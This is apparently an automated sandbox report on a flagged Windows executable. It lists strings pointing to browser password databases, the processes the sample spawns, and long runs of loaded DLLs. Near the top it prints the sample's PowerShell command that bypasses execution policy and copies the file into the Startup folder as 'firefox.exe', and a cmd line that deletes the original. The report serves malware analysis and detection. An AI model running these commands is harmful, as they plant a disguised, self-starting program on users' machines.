Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.7.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.7.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.7.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: 4204906443976354681473.tmp.7.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: jd4t3R7hOq.exe	Virustotal: Detection: 77%
Source: jd4t3R7hOq.exe	ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Users\user\Desktop\jd4t3R7hOq.exe "C:\Users\user\Desktop\jd4t3R7hOq.exe"
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\jd4t3R7hOq.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process created: C:\Users\user\Desktop\jd4t3R7hOq.exe "C:\Users\user\Desktop\jd4t3R7hOq.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "jd4t3R7hOq.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe"
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\jd4t3R7hOq.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe'	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process created: C:\Users\user\Desktop\jd4t3R7hOq.exe "C:\Users\user\Desktop\jd4t3R7hOq.exe"	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "jd4t3R7hOq.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: crtdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
